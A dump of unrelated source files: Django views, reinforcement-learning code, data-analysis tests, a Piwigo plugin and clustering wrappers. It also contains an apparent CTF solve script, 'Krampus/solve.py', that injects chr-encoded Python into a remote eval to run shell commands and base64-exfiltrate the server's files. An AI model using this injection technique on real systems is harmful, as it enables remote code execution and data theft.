cmd = [testlib.get_python_bin(pyver), '-c', 'import sys; print(sys.maxunicode)']
maxunicode = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('utf-8')
assert int(maxunicode) > 65535, "Found UCS2 build"
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_imports(pyver):
imports = {
"2.7": ['pkg_resources'],
"3.4": [],
"3.5": ['pkg_resources'],
"3.6": [],
}
for imp in imports[pyver]:
subprocess.check_call([testlib.get_python_bin(pyver), '-c', 'import ' + imp])
| 1.289063 | 1 |
django/app_whoami/views.py | a-rey/aaronmreyes_heroku | 1 | 46212 | <reponame>a-rey/aaronmreyes_heroku
import decimal
import ipaddress
import django.http
import django.core.cache
import app_whoami.models
def main(request):
"""
request handler for '/'.
"""
# try to get client IP from HTTP header
raw_ip = request.META.get('HTTP_X_FORWARDED_FOR', request.META.get('REMOTE_ADDR', None))
if not raw_ip:
return django.http.JsonResponse({'error': 'IP header not found'})
# X_FORWARDED_FOR: client1, proxy1, proxy2, ...
raw_ip = raw_ip.split(',')[0].strip()
if not raw_ip:
return django.http.JsonResponse({'error': 'IP header format invalid'})
# try to parse the user IP
try:
ip = ipaddress.ip_address(raw_ip)
results = {'IP': str(ip)}
except:
return django.http.JsonResponse({'error': 'IP header value invalid'})
# check cache if IP already looked up
if int(ip) in django.core.cache.cache:
return django.http.JsonResponse(django.core.cache.cache.get(int(ip)))
# lookup ASN IP block in database
asn_blk = app_whoami.models.AsnBlock.objects.filter(
ip_start__lte=decimal.Decimal(int(ip)),
ip_end__gte=decimal.Decimal(int(ip)),
ipv4=(ip.version == 4)
).values().first()
# combine info into one object
if asn_blk:
results.update(asn_blk)
# lookup city IP block
city_blk = app_whoami.models.CityBlock.objects.filter(
ip_start__lte=decimal.Decimal(int(ip)),
ip_end__gte=decimal.Decimal(int(ip)),
ipv4=(ip.version == 4)
).values().first()
if city_blk:
# from city IP block, lookup city location
city_loc = app_whoami.models.CityLocation.objects.filter(
geoname_id=city_blk['geoname_id']
).values().first()
# combine info into one object
if city_loc:
results.update(city_loc)
results.update(city_blk)
# remove backend lookup values from response
results.pop('id', None)
results.pop('ipv4', None)
results.pop('ip_end', None)
results.pop('ip_start', None)
results.pop('geoname_id', None)
# format creation timestamp
if 'created_at' in results:
results['created_at'] = results['created_at'].strftime('%d %b %Y %H:%M:%S %Z')
# change keys to be uppercase
results = {k.upper(): v for k, v in results.items()}
# store result in cache for a faster hit next lookup request
django.core.cache.cache.set(int(ip), results)
return django.http.JsonResponse(results)
| 1.601563 | 2 |
Game_AI_and_Reinforcement_Learning/ConnectX/v2/actor.py | BEPb/Python-100-days | 16 | 46340 | """
Python 3.9 program for self-play between agents of the current and the previous generation
a Python program for studying Reinforcement Learning
File name: actor.py
Version: 0.1
Author: <NAME>
Date: 2021-12-23
"""
import numpy as np
import parl
import os
from alphazero_agent import create_agent
from MCTS import MCTS
from Arena import Arena
from utils import win_loss_draw
@parl.remote_class(wait=False)
class Actor(object):
    def __init__(self, game, args, seed):  # class initialisation
        np.random.seed(seed)
        os.environ['OMP_NUM_THREADS'] = "1"
        self.game = game  # instance (object) of the board/game class for a game between two players
        self.args = args  # takes all arguments from the main program
        # 'master_address': 'localhost:8010',  # master address of the xparl cluster
        # 'actors_num': 1,  # number of remote actors
        # 'numIters': 1,  # total number of iterations
        # 'numEps': 1,  # number of complete self-play games to simulate during a new iteration
        # 'arenaCompare': 50,  # number of games to play during arena play (pitting)
        # 'numMCTSSims': 800,  # number of game moves to simulate with MCTS
        # 'updateThreshold': 0.8,  # threshold fraction of games that must be won to accept the new agent
        # 'cpuct': 4,  # CPUCT parameter
        # 'dirichletAlpha': 1.0,  # alpha parameter of the Dirichlet noise
        # 'numItersForTrainExamplesHistory': 20,  # history of examples from the latest iterations
        # 'checkpoint': './saved_model/',  # folder for saving models and training examples
        # neural network of previous generation
        self.previous_agent = create_agent(self.game, cuda=False)
        # neural network of current generation
        self.current_agent = create_agent(self.game, cuda=False)
        # MCTS of previous generation
        self.previous_mcts = MCTS(
            self.game, self.previous_agent, self.args, dirichlet_noise=True)
        # MCTS of current generation
        self.current_mcts = MCTS(
            self.game, self.current_agent, self.args, dirichlet_noise=True)
    def self_play(self, current_weights, game_num):
        """
        Collect training data through self-play.
        Args:
            current_weights (numpy.array): latest weights of the neural network
            game_num (int): number of self-play games to run
        Returns:
            train_examples (list): examples of the form (canonicalBoard, currPlayer, pi, v)
        """
        print('Self-play of one of the created agents (uses a single core)')
        # update weights of current neural network with latest weights
        self.current_agent.set_weights(current_weights)
        train_examples = []  # create an empty list of training examples
        for _ in range(game_num):
            print('Starting game No.', _)
            # reset node state of MCTS
            print('reset the MCTS node state')
            self.current_mcts = MCTS(self.game, self.current_agent, self.args, dirichlet_noise=True)
            print('training the MCTS node')
            train_examples.extend(self._executeEpisode())
            # _executeEpisode() plays a single game
        return train_examples
    def pitting(self, previous_weights, current_weights, games_num):
        """Fight between the agent of the previous generation and the agent of the current generation
        Args:
            previous_weights (numpy.array): weights of the previous-generation neural network
            current_weights (numpy.array): weights of the current-generation neural network
            games_num (int): number of fights to play
        Returns:
            tuple of (number of games won by the previous agent, number of games won by the current agent,
            number of games that ended in a draw)
        """
        print('Pitting')
        # update weights of previous and current neural network
        self.previous_agent.set_weights(previous_weights)
        self.current_agent.set_weights(current_weights)
        # reset node state of MCTS
        print('reset the MCTS node state before the arena')
        self.previous_mcts = MCTS(self.game, self.previous_agent, self.args)
        self.current_mcts = MCTS(self.game, self.current_agent, self.args)
        arena = Arena(
            lambda x: np.argmax(self.previous_mcts.getActionProb(x, temp=0)),
            lambda x: np.argmax(self.current_mcts.getActionProb(x, temp=0)),
            self.game)
        previous_wins, current_wins, draws = arena.playGames(games_num)
        return (previous_wins, current_wins, draws)  # returns the number of previous wins, current wins and draws
    def evaluate_test_dataset(self, current_weights, test_dataset):
        """
        Evaluate the performance of the newest neural network
        Args:
            current_weights (numpy.array): latest weights of the neural network
            test_dataset (list): list of test positions to evaluate
        Returns:
            tuple of (number of perfect moves, number of good moves)
        """
        print('Evaluation')
        # update weights of current neural network with latest weights
        self.current_agent.set_weights(current_weights)
        # measure the quality of the played moves
        perfect_move_count, good_move_count = 0, 0
        for data in test_dataset:
            self.current_mcts = MCTS(self.game, self.current_agent, self.args)  # query the MCTS tree
            x = self.game.getCanonicalForm(data['board'], data['player'])
            agent_move = int(np.argmax(self.current_mcts.getActionProb(x, temp=0)))  # the move (column index) chosen by the agent
            moves = data["move_score"]  # list of scores
            perfect_score = max(moves)  # the maximum value in the score list
            perfect_moves = [i for i in range(7) if moves[i] == perfect_score]  # indices of the columns (out of 7) with the best score
            if agent_move in perfect_moves:
                perfect_move_count += 1  # count of perfect moves
            print('perfect_move_count', perfect_move_count)
            print('Determine win/loss/draw - ', win_loss_draw(moves[agent_move]))
            if win_loss_draw(moves[agent_move]) == win_loss_draw(perfect_score):
                good_move_count += 1  # count of good moves
                print('good_move_count', good_move_count)
        return (perfect_move_count, good_move_count)
    def _executeEpisode(self):  # plays a single game
        """
        This function executes one episode of self-play, starting with player 1.
        As the game is played, each turn is added as a training example to
        trainExamples. The game is played until it ends. After the game
        ends, the outcome of the game is used to assign values to each example
        in trainExamples.
        It uses temp = 1 if episodeStep < tempThresholdStep, and thereafter
        uses temp = 0.
        Returns:
            trainExamples: a list of examples of the form (canonicalBoard, currPlayer, pi, v)
                           pi is the MCTS-informed policy vector, v is +1 if
                           the player eventually won the game, else -1.
        """
        print('Episode of a single game')
        trainExamples = []
        board = self.game.getInitBoard()
        self.curPlayer = 1
        episodeStep = 0
        while True:
            episodeStep += 1
            print('Self-play between the current-generation and previous-generation agents, move = ', episodeStep)
            canonicalBoard = self.game.getCanonicalForm(board, self.curPlayer)
            temp = int(episodeStep < self.args.tempThresholdStep)
            pi = self.current_mcts.getActionProb(canonicalBoard, temp=temp)
            sym = self.game.getSymmetries(canonicalBoard, pi)
            for b, p in sym:  # board, pi
                trainExamples.append([b, self.curPlayer, p, None])
            action = np.random.choice(len(pi), p=pi)
            board, self.curPlayer = self.game.getNextState(
                board, self.curPlayer, action)
            r = self.game.getGameEnded(board, self.curPlayer)
            if r != 0:
                return [(x[0], x[2], r * ((-1)**(x[1] != self.curPlayer)))
                        for x in trainExamples]
| 2.125 | 2 |
spar_python/report_generation/ta1/ta1_section_performance_percentiles.py | nathanawmk/SPARTA | 37 | 46468 | # *****************************************************************
# Copyright 2013 MIT Lincoln Laboratory
# Project: SPAR
# Authors: SY
# Description: Section class
#
#
# Modifications:
# Date Name Modification
# ---- ---- ------------
# 19 Sep 2013 SY Original version
# *****************************************************************
# SPAR imports:
import spar_python.report_generation.ta1.ta1_section as section
import spar_python.report_generation.common.regression as regression
import spar_python.report_generation.common.latex_classes as latex_classes
import spar_python.report_generation.ta1.ta1_schema as t1s
import spar_python.report_generation.ta1.ta1_analysis_percentiles as percentiles
import spar_python.report_generation.ta1.ta1_analysis_input as t1ai
class Ta1PercentilesSection(section.Ta1Section):
"""The percentiles section of the TA1 report"""
def _store_query_percentiles_table(self):
"""Stores the LaTeX string representing the query percentiles table
on the output object."""
constraint_list = self._config.get_constraint_list(
require_correct=True)
categories = self._config.results_db.get_unique_query_values(
simple_fields=[(t1s.DBF_TABLENAME, t1s.DBF_NUMRECORDS),
(t1s.DBF_TABLENAME, t1s.DBF_RECORDSIZE),
(t1s.DBP_TABLENAME, t1s.DBP_SELECTIONCOLS),
(t1s.DBF_TABLENAME, t1s.DBF_CAT)],
constraint_list=constraint_list)
# create the percentiles table:
caption = "Number of Percentiles passing the $%s+%sx$ requirement" % (
str(self._config.a_req), str(self._config.b_req))
percentiles_table = latex_classes.LatexTable(
caption, "perc_main",
["DBNR", "DBRS", "Select", "Query Type", "Num Passing $\%$iles"])
# compute number of percentiles met for every query category:
for (dbnr, dbrs, selection_cols, query_cat) in categories:
inp = t1ai.Input()
inp[t1s.DBF_CAT] = query_cat
inp[t1s.DBF_NUMRECORDS] = dbnr
inp[t1s.DBF_RECORDSIZE] = dbrs
inp[t1s.DBP_SELECTIONCOLS] = selection_cols
performer_constraint_list = self._config.get_constraint_list(
usebaseline=False) + inp.get_constraint_list()
baseline_constraint_list = self._config.get_constraint_list(
usebaseline=True) + inp.get_constraint_list()
percentile_getter = percentiles.Ta1PercentileGetter(
self._config.results_db, performer_constraint_list,
baseline_constraint_list)
if percentile_getter.has_values():
all_met = percentile_getter.get_all_met(
self._config.a_req, self._config.b_req)
percentiles_table.add_content([
inp.test_db.get_db_num_records_str(),
inp.test_db.get_db_record_size_str(), selection_cols,
query_cat, len(all_met)])
self._outp["query_percentiles_table"] = percentiles_table.get_string()
    def _populate_output(self):
        """Populates the output object which is passed to the Jinja template
in get_string."""
self._store_query_percentiles_table()
| 1.65625 | 2 |
apps/common/behaviors/uploadable.py | yudame/prakti-api | 0 | 46596 | import json
import uuid
from jsonfield import JSONField
from django.db import models
class Uploadable(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
url = models.URLField(default="")
meta_data = JSONField(blank=True, null=True)
class Meta:
abstract = True
# MODEL PROPERTIES
@property
def file_type(self):
if self.meta_data and isinstance(self.meta_data, str):
self.meta_data = json.loads(self.meta_data)
try:
return self.meta_data.get('type', "") if self.meta_data else ""
except:
return ""
@property
def name(self):
if self.meta_data and isinstance(self.meta_data, str):
self.meta_data = json.loads(self.meta_data)
return self.meta_data.get('name', "") if self.meta_data else ""
@property
def file_extension(self):
if self.meta_data and isinstance(self.meta_data, str):
self.meta_data = json.loads(self.meta_data)
return self.meta_data.get('ext', "") if self.meta_data else ""
@property
def link_title(self):
if self.name:
title = self.name
elif 'etc' in self.meta_data:
title = (self.meta_data['etc'] or "").upper()
else:
title = (self.meta_data['type'] or
"").upper() if 'type' in self.meta_data else ""
if 'ext' in self.meta_data:
title = title + " .%s" % (self.meta_data['ext'] or "").upper()
return title
| 1.554688 | 2 |
tests/test_analysis/test_plotters.py | martins0n/etna | 326 | 46724 | import numpy as np
import pandas as pd
import pytest
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import TheilSenRegressor
from etna.analysis import get_residuals
from etna.analysis import plot_residuals
from etna.analysis import plot_trend
from etna.analysis.plotters import _get_labels_names
from etna.datasets import TSDataset
from etna.metrics import MAE
from etna.models import LinearPerSegmentModel
from etna.pipeline import Pipeline
from etna.transforms import BinsegTrendTransform
from etna.transforms import LagTransform
from etna.transforms import LinearTrendTransform
from etna.transforms import STLTransform
from etna.transforms import TheilSenTrendTransform
@pytest.fixture
def residuals():
timestamp = pd.date_range("2020-01-01", periods=100, freq="D")
df = pd.DataFrame(
{
"timestamp": timestamp.tolist() * 2,
"segment": ["segment_0"] * len(timestamp) + ["segment_1"] * len(timestamp),
"target": np.arange(len(timestamp)).tolist() + (np.arange(len(timestamp)) + 1).tolist(),
}
)
df_wide = TSDataset.to_dataset(df)
ts = TSDataset(df=df_wide, freq="D")
forecast_df = ts[timestamp[10:], :, :]
forecast_df.loc[:, pd.IndexSlice["segment_0", "target"]] = -1
forecast_df.loc[:, pd.IndexSlice["segment_1", "target"]] = 1
residuals_df = ts[timestamp[10:], :, :]
residuals_df.loc[:, pd.IndexSlice["segment_0", "target"]] += 1
residuals_df.loc[:, pd.IndexSlice["segment_1", "target"]] -= 1
return residuals_df, forecast_df, ts
def test_get_residuals(residuals):
"""Test that get_residuals finds residuals correctly."""
residuals_df, forecast_df, ts = residuals
actual_residuals = get_residuals(forecast_df=forecast_df, ts=ts)
assert actual_residuals.to_pandas().equals(residuals_df)
def test_get_residuals_not_matching_lengths(residuals):
"""Test that get_residuals fails to find residuals correctly if ts hasn't answers."""
residuals_df, forecast_df, ts = residuals
ts = TSDataset(df=ts[ts.index[:-10], :, :], freq="D")
with pytest.raises(KeyError):
_ = get_residuals(forecast_df=forecast_df, ts=ts)
def test_get_residuals_not_matching_segments(residuals):
"""Test that get_residuals fails to find residuals correctly if segments of dataset and forecast differ."""
residuals_df, forecast_df, ts = residuals
columns_frame = forecast_df.columns.to_frame()
columns_frame["segment"] = ["segment_0", "segment_3"]
forecast_df.columns = pd.MultiIndex.from_frame(columns_frame)
with pytest.raises(KeyError, match="Segments of `ts` and `forecast_df` should be the same"):
_ = get_residuals(forecast_df=forecast_df, ts=ts)
def test_plot_residuals_fails_unknown_feature(example_tsdf):
    """Test that plot_residuals fails if it meets an unknown feature."""
pipeline = Pipeline(
model=LinearPerSegmentModel(), transforms=[LagTransform(in_column="target", lags=[5, 6, 7])], horizon=5
)
metrics, forecast_df, info = pipeline.backtest(ts=example_tsdf, metrics=[MAE()], n_folds=3)
with pytest.raises(ValueError, match="Given feature isn't present in the dataset"):
        plot_residuals(forecast_df=forecast_df, ts=example_tsdf, feature="unknown_feature")
@pytest.mark.parametrize(
"poly_degree, trend_transform_class",
(
[1, LinearTrendTransform],
[2, LinearTrendTransform],
[1, TheilSenTrendTransform],
[2, TheilSenTrendTransform],
),
)
def test_plot_trend(poly_degree, example_tsdf, trend_transform_class):
plot_trend(ts=example_tsdf, trend_transform=trend_transform_class(in_column="target", poly_degree=poly_degree))
@pytest.mark.parametrize("detrend_model", (TheilSenRegressor(), LinearRegression()))
def test_plot_bin_seg(example_tsdf, detrend_model):
plot_trend(ts=example_tsdf, trend_transform=BinsegTrendTransform(in_column="target", detrend_model=detrend_model))
@pytest.mark.parametrize("period", (7, 30))
def test_plot_stl(example_tsdf, period):
plot_trend(ts=example_tsdf, trend_transform=STLTransform(in_column="target", period=period))
@pytest.mark.parametrize(
"poly_degree, expect_values, trend_class",
(
[1, True, LinearTrendTransform],
[2, False, LinearTrendTransform],
[1, True, TheilSenTrendTransform],
[2, False, TheilSenTrendTransform],
),
)
def test_get_labels_names_linear_coeffs(example_tsdf, poly_degree, expect_values, trend_class):
ln_tr = trend_class(in_column="target", poly_degree=poly_degree)
example_tsdf.fit_transform([ln_tr])
segments = example_tsdf.segments
_, linear_coeffs = _get_labels_names([ln_tr], segments)
if expect_values:
assert list(linear_coeffs.values()) != ["", ""]
else:
assert list(linear_coeffs.values()) == ["", ""]
| 1.679688 | 2 |
tests/test_k2.py | LanzLagman/chronos | 0 | 46852 | <filename>tests/test_k2.py
# -*- coding: utf-8 -*-
import pandas as pd
import lightkurve as lk
from chronos.k2 import K2, Everest, K2sff
EPICID = 211916756 # k2-95
CAMPAIGN = 5 # or 18
def test_k2_attributes():
"""
"""
# test inherited attributes
s = K2(epicid=EPICID, campaign=CAMPAIGN)
assert s.epicid is not None
assert s.target_coord is not None
gaia_params = s.query_gaia_dr2_catalog(return_nearest_xmatch=True)
assert isinstance(gaia_params, pd.Series)
tic_params = s.query_tic_catalog(return_nearest_xmatch=True)
assert isinstance(tic_params, pd.Series)
def test_k2_lc_pipeline():
s = K2(epicid=EPICID, campaign=CAMPAIGN)
s.get_lc("sap")
assert isinstance(s.lc_sap, lk.LightCurve)
s.get_lc("pdcsap")
assert isinstance(s.lc_pdcsap, lk.LightCurve)
# def test_k2_lc_custom():
# s = K2(epicid=EPICID, campaign=CAMPAIGN)
# sap = s.make_custom_lc()
def test_k2_tpf():
s = K2(epicid=EPICID, campaign=CAMPAIGN)
tpf = s.get_tpf()
assert isinstance(tpf, lk.targetpixelfile.TargetPixelFile)
def test_everest():
"""
"""
s = Everest(epicid=EPICID, campaign=CAMPAIGN)
assert isinstance(s.lc_everest, lk.LightCurve)
def test_k2sff():
"""
"""
s = K2sff(epicid=EPICID, campaign=CAMPAIGN)
assert isinstance(s.lc_k2sff, lk.LightCurve)
| 1.429688 | 1 |
WebODM-master/plugins/cloudimport/platforms/piwigo.py | abhinavsri000/UAVision | 0 | 46980 | # Check http://piwigo.com/
from urllib.parse import urlparse
from os import path
from plugins.cloudimport.cloud_platform import File, Folder
from plugins.cloudimport.extensions.cloud_library import CloudLibrary
class Platform(CloudLibrary):
def __init__(self):
super().__init__('Piwigo', 'http://{server_url}/index.php?/category/{category_id}')
# Cloud Platform
def platform_file_processing(self, files):
# Piwigo has the concept of physical albums, that basically expose the actual folders in the file system.
# So it might happen that if the File Uploader plugin is used for GCP files, that the files will need to be renamed to store multiple GCP files.
# So basically we are taking any file that contains the string 'gcp_list' and has the extension '.txt' and rename it to 'gcp_list.txt'
return [self._map_gcp_file_if_necessary(file) for file in files]
def get_server_and_folder_id_from_url(self, url):
parse_result = urlparse(url)
paths = parse_result.query.split('/')
if not 'category' in paths or paths.index('category') >= len(paths) - 1:
raise Exception('Wrong URL format')
else:
category_id = paths[paths.index('category') + 1]
path = parse_result.path
if not 'index.php' in path:
raise Exception('Wrong URL format')
path = path[0:path.index('index.php')]
server = parse_result.scheme + '://' + parse_result.netloc + '/' + path
return server, category_id
def build_folder_api_url(self, server_url, folder_id):
return '{server_url}/ws.php?format=json&method=pwg.categories.getList&cat_id={folder_id}&recursive=false'.format(server_url = server_url, folder_id = folder_id)
def parse_payload_into_folder(self, payload):
result = payload['result']['categories'][0]
return Folder(result['name'], result['url'], result['nb_images'])
def build_list_files_in_folder_api_url(self, server_url, folder_id):
# ToDo: add pagination
return '{server_url}/ws.php?format=json&method=pwg.categories.getImages&cat_id={folder_id}&recursive=false&per_page=500'.format(server_url = server_url, folder_id = folder_id)
def parse_payload_into_files(self, payload):
result = payload['result']
return [File(image['file'], image['element_url']) for image in result['images']]
def _map_gcp_file_if_necessary(self, file):
_, file_extension = path.splitext(file.name)
if file_extension.lower() == ".txt" and 'gcp_list' in file.name:
return File('gcp_list.txt', file.url, file.other)
return file
# Cloud Library
def build_folder_list_api_url(self, server_url):
return '{}/ws.php?format=json&method=pwg.categories.getList&recursive=true&tree_output=true'.format(server_url)
def parse_payload_into_folders(self, payload):
categories = payload['result']
return self._flatten_list([self._build_category(cat) for cat in categories])
def _build_category(self, category):
name = category['name']
images = category['nb_images']
url = category['url']
subcategories = self._flatten_list([self._build_category(subcat) for subcat in category['sub_categories']]) if category['nb_categories'] > 0 else []
for subcategory in subcategories:
subcategory.name = name + ' > ' + subcategory.name
folder = [Folder(name, url, images)] if images > 0 else []
return folder + subcategories
def _flatten_list(self, list_of_lists):
return [item for sublist in list_of_lists for item in sublist]
| 1.53125 | 2 |
mobo/cluster.py | seatonullberg/mobo | 0 | 47108 | from abc import ABC
import numpy as np
from sklearn.cluster import DBSCAN, KMeans
from typing import Callable, Optional, Union
class BaseClusterer(ABC):
"""Abstract base class for Clusterers."""
def __call__(self, data: np.ndarray) -> np.ndarray:
pass
class DbscanClusterer(BaseClusterer):
"""DBSCAN clustering technique.
Args:
Reference:
https://scikit-learn.org/stable/modules/generated/sklearn.cluster.DBSCAN.html
"""
def __init__(self,
eps: float = 0.5,
min_samples: int = 5,
metric: Union[str, Callable] = "euclidean",
metric_params: Optional[dict] = None,
algorithm: str = "auto",
leaf_size: int = 30,
p: Optional[float] = None) -> None:
self._clusterer = DBSCAN(eps=eps,
min_samples=min_samples,
metric=metric,
metric_params=metric_params,
algorithm=algorithm,
leaf_size=leaf_size,
p=p,
n_jobs=None)
def __call__(self, data: np.ndarray) -> np.ndarray:
return self._clusterer.fit_predict(data)
class KmeansClusterer(BaseClusterer):
"""KMeans clustering technique.
Args:
Reference:
https://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html
"""
def __init__(self,
n_clusters: int = 8,
init: Union[str, np.ndarray] = "k-means++",
n_init: int = 10,
max_iter: int = 300,
tol: float = 1e-4,
precompute_distances: Union[str, bool] = "auto",
verbose: int = 0,
random_state: Union[int, None] = None,
copy_x: bool = True,
algorithm: str = "auto") -> None:
self._clusterer = KMeans(n_clusters=n_clusters,
init=init,
n_init=n_init,
max_iter=max_iter,
tol=tol,
precompute_distances=precompute_distances,
verbose=verbose,
random_state=random_state,
copy_x=copy_x,
algorithm=algorithm,
n_jobs=None)
def __call__(self, data: np.ndarray) -> np.ndarray:
return self._clusterer.fit_predict(data)
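if __name__ == "__main__":
    # Minimal smoke test of the wrappers (illustrative only; assumes the
    # scikit-learn version this module targets, since newer releases dropped
    # the `precompute_distances`/`n_jobs` KMeans arguments used above).
    points = np.random.rand(20, 2)
    print(KmeansClusterer(n_clusters=2)(points))
    print(DbscanClusterer(eps=0.3, min_samples=3)(points))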
| 2.46875 | 2 |
karborclient/v1/services.py | thuylt2/karborclient | 0 | 47236 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from karborclient.common import base
class Service(base.Resource):
def __repr__(self):
return "<Service %s>" % self._info
class ServiceManager(base.ManagerWithFind):
resource_class = Service
def enable(self, service_id):
"""Enable the service specified by the service ID
:param service_id: The ID of the service to enable.
"""
body = {
'status': 'enabled'
}
return self._update('/os-services/%s' % service_id, body, "service")
def disable(self, service_id):
"""Disable the service specified by the service ID.
:param service_id: The ID of the service to disable.
"""
body = {
'status': 'disabled'
}
return self._update('/os-services/%s' % service_id, body, "service")
def disable_log_reason(self, service_id, reason):
"""Disable the service with a reason.
:param service_id: The ID of the service to disable.
:param reason: The reason for disabling a service.
"""
body = {
'status': 'disabled',
'disabled_reason': reason
}
return self._update("/os-services/%s" % service_id, body, "service")
def list(self, host=None, binary=None):
"""Lists all services."""
search_opts = {
'host': host,
'binary': binary
}
resource_type = "os-services"
url = self._build_list_url(resource_type, search_opts=search_opts)
return self._list(url, 'services')
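# Hypothetical usage sketch (the `client` object and its `services` manager
# attribute are assumptions for illustration; they are not defined here):
#
#   for service in client.services.list(binary="karbor-operationengine"):
#       client.services.disable_log_reason(service.id, "maintenance window")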
| 1.65625 | 2 |
XMAS2018/Krampus/solve.py | flawwan/CTF-Writeups | 27 | 47364 | <filename>XMAS2018/Krampus/solve.py
from pwn import *
import base64
import sys
def convertstr(convert, debug=False):
if debug:
print convert
output = ""
for i in convert:
output+= "chr(%d)+" % ord(i)
return output[:-1]
if len(sys.argv) == 2 and sys.argv[1] == "local":
r = remote("0.0.0.0",2000)
else:
r = remote("192.168.3.11",14000)
for i in range(5):
r.readuntil("<You>:")
r.sendline("1")
def dump():
payload_search = convertstr("__import__('os').system('find -follow')")
r.sendline("eval(%s)"%payload_search)
r.readuntil("Krampus>: ")
skip = ["./server.jar"]
lines = r.readuntil("You>: ")[:-10].splitlines()
print "Found %d files" % len(lines)
for f in lines:
print "Downloading file %s" % f
if f in skip:
print "Banned file... Skipping"
continue
if os.path.isfile("./minecraft/%s" % f):
print "File already downloaded..."
continue
payloadchunksize = convertstr("__import__('os').system('cat ./%s | base64 -w 0 | wc -c')" % f)
r.sendline("eval(%s)"%payloadchunksize)
r.readuntil("Krampus>: ")
chunk_size = (r.readuntil("You>: ")[:-9])
print "SIZE: %s" % chunk_size
if "Krampus stares back" in chunk_size:
print "Found directory..."
dirpath = "./minecraft/%s" % f
if not os.path.exists(dirpath):
os.mkdir(dirpath)
print "Directory created"
continue
else:
chunk_size = int(chunk_size)
#This is the ugliest code i have ever seen. That's right. I wonder who wrote it
chunk_ = range(1, chunk_size+1)
n = 50000
output = [chunk_[i:i+n] for i in range(0, len(chunk_), n)]
print "Size of file is %d lines" % chunk_size
counter = 1
data = ""
for i in output:
diff = (i[-1]-i[0])+1
print "Processing chunk [%d of %d]" % (counter,chunk_size)
high = counter+diff
payload = convertstr("__import__('os').system('cat %s | base64 -w 0 | cut -c%d-%d && echo stop')" % (f, counter,high))
counter += diff+1
r.sendline("eval(%s)" % payload)
r.readuntil("Krampus>: ")
data += r.readuntil("stop")[:-5]
data = base64.b64decode(data)
with open('minecraft/%s' % f, 'w') as the_file:
the_file.write(data)
dump()
r.close() | 1.765625 | 2
qtpyvcp/widgets/qtdesigner/stylesheet.py | Lcvette/qtpyvcp | 71 | 47492 | <filename>qtpyvcp/widgets/qtdesigner/stylesheet.py
# Copyright (c) 2017-2018, SLAC National Accelerator Laboratory
# This file has been adapted from PyDM, and can be redistributed and/or
# modified in accordance with terms in conditions set forth in the BSD
# 3-Clause License. You can find the complete licence text in the LICENCES
# directory.
# Links:
# PyDM Project: https://github.com/slaclab/pydm
# PyDM Licence: https://github.com/slaclab/pydm/blob/master/LICENSE.md
""""Utility to handle importing the global stylesheet for QtPyVCP widgets.
"""
import os
from qtpy.QtWidgets import QApplication
# Set up logging
from qtpyvcp.utilities import logger
LOG = logger.getLogger(__name__)
# Fallback global stylesheet if there is no global stylesheet provided via env
# variable or command line parameter
GLOBAL_STYLESHEET = os.path.realpath(
os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'..',
'default_stylesheet.qss'
)
)
__style_data = None
def clear_cache():
"""Clear the cache for stylesheet data"""
global __style_data
__style_data = None
def apply_stylesheet(stylesheet_file_path=None, widget=None):
"""Apply a stylesheet to the current Qt Designer form (a .ui file).
Args:
stylesheet_file_path (str) : The full path to a global CSS stylesheet file
widget (QWidget) : The widget in which we want to apply the stylesheet.
"""
# Load style data from the stylesheet file. Otherwise, the fallback is
# already in place, i.e. QtPyVCP will be using the data from the global
# stylesheet
style = _get_style_data(stylesheet_file_path)
if not style:
return
if not widget:
widget = QApplication.instance()
widget.setStyleSheet(style)
def _get_style_data(stylesheet_file_path=None):
"""Read the global stylesheet file and provide the style data as a str.
Args:
stylesheet_file_path (str) : The path to the global stylesheet.
Returns:
str : The style data read from the stylesheet file
"""
global __style_data
if not stylesheet_file_path:
stylesheet_file_path = os.getenv("QSS_STYLESHEET", None)
if stylesheet_file_path == "":
stylesheet_file_path = None
if __style_data:
return __style_data
__style_data = None
load_default = True
if stylesheet_file_path is not None:
try:
with open(stylesheet_file_path, 'r') as stylesheet_file:
LOG.info(
"Opening style file '{0}'...".format(stylesheet_file_path))
__style_data = stylesheet_file.read()
load_default = False
except Exception as ex:
__style_data = None
LOG.error(
"Error reading the stylesheet file '{0}'. Exception: {1}".format(
stylesheet_file_path,
str(ex)))
if load_default:
try:
with open(GLOBAL_STYLESHEET, 'r') as default_stylesheet:
LOG.info("Opening the default stylesheet '{0}'...".format(
GLOBAL_STYLESHEET))
__style_data = default_stylesheet.read()
except Exception as ex:
__style_data = None
LOG.exception("Cannot find the default stylesheet file '{0}'.".format(GLOBAL_STYLESHEET))
return __style_data
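# Illustrative usage sketch (paths are placeholders; a QApplication must exist
# before a stylesheet can be applied):
#
#   from qtpy.QtWidgets import QApplication
#   app = QApplication([])
#   apply_stylesheet()                       # falls back to the bundled default_stylesheet.qss
#   apply_stylesheet("/path/to/custom.qss")  # or apply a custom global stylesheet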
| 1.289063 | 1 |
packages/conan/recipes/imath/conanfile.py | boberfly/aswf-docker | 3 | 47620 | <gh_stars>1-10
from conans import ConanFile, tools, CMake
import os
required_conan_version = ">=1.38.0"
class ImathConan(ConanFile):
name = "imath"
description = "Imath is a C++ and python library of 2D and 3D vector, matrix, and math operations for computer graphics."
topics = "conan", "imath", "python", "vfx"
homepage = "https://github.com/AcademySoftwareFoundation/Imath"
license = "BSD-3-Clause"
url = "https://github.com/AcademySoftwareFoundation/aswf-docker"
settings = (
"os",
"arch",
"compiler",
"build_type",
"python",
)
generators = "cmake_find_package_multi"
_cmake = None
_source_subfolder = "source_subfolder"
def _is_dummy(self):
return tools.Version(self.version) < "3"
def requirements(self):
if self._is_dummy():
return
self.requires(f"python/(latest)@{self.user}/{self.channel}")
self.requires(f"boost/(latest)@{self.user}/{self.channel}")
def build_requirements(self):
if self._is_dummy():
return
self.build_requires(f"cmake/(latest)@{self.user}/{self.channel}")
def source(self):
if self._is_dummy():
with open("imath-2-is-a-dummy-package.txt", "w") as f:
f.write(
